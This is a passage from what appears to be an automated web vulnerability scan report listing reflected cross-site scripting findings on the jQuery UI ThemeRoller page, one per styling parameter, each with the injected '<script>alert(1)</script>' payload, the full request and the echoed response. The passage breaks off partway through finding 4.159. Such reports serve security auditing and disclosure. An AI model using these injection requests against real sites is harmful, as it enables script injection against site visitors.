4.150. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a6a4"><script>alert(1)</script>35255517304 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc2a6a4"><script>alert(1)</script>35255517304&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc2a6a4"><script>alert(1)</script>35255517304&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextu
...[SNIP]...

4.151. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872b5"><script>alert(1)</script>9fff6b1c01 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a872b5"><script>alert(1)</script>9fff6b1c01&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a872b5"><script>alert(1)</script>9fff6b1c01&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacit
...[SNIP]...

4.152. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a120e"><script>alert(1)</script>942bd0c6a4c was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08a120e"><script>alert(1)</script>942bd0c6a4c&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
et%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08a120e"><script>alert(1)</script>942bd0c6a4c&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDe
...[SNIP]...

4.153. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4800b"><script>alert(1)</script>577c180fa0c was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f4800b"><script>alert(1)</script>577c180fa0c&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f4800b"><script>alert(1)</script>577c180fa0c&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=
...[SNIP]...

4.154. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b6a"><script>alert(1)</script>69ecd42034e was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb0988b6a"><script>alert(1)</script>69ecd42034e&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ult=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb0988b6a"><script>alert(1)</script>69ecd42034e&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgT
...[SNIP]...

4.155. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb08"><script>alert(1)</script>c5888f9db9a was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4pxcbb08"><script>alert(1)</script>c5888f9db9a&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4pxcbb08"><script>alert(1)</script>c5888f9db9a&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.pn
...[SNIP]...

4.156. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ffad"><script>alert(1)</script>c201a131bf9 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px3ffad"><script>alert(1)</script>c201a131bf9 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
verlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px3ffad"><script>alert(1)</script>c201a131bf9" type="text/css" media="all" />
...[SNIP]...

4.157. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48878"><script>alert(1)</script>450737abb18 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f0048878"><script>alert(1)</script>450737abb18&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f0048878"><script>alert(1)</script>450737abb18&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b
...[SNIP]...

4.158. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3de"><script>alert(1)</script>b2a0e37ea13 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=3333334e3de"><script>alert(1)</script>b2a0e37ea13&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Header=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=3333334e3de"><script>alert(1)</script>b2a0e37ea13&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHove
...[SNIP]...

4.159. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61800"><script>alert(1)</script>1a28793f45b was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

